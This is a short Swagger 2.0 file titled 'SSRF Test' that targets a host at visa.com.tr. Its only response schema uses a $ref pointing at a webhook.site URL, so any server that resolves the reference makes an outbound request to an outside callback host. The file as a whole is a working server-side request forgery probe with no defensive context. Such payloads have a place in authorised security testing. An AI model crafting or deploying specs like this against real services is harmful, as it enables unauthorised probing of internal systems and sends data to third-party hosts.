swagger: "2.0"
info:
  title: "SSRF Test"
  version: "1.0"
host: "api.tektiklaode.visa.com.tr"
schemes:
  - https
paths:
  /test:
    get:
      summary: "SSRF Trigger"
      responses:
        200:
          description: "Should trigger SSRF"
          schema:
            $ref: "https://webhook.site/a44f8421-8b84-4309-bd87-18a8fb8ddc06"
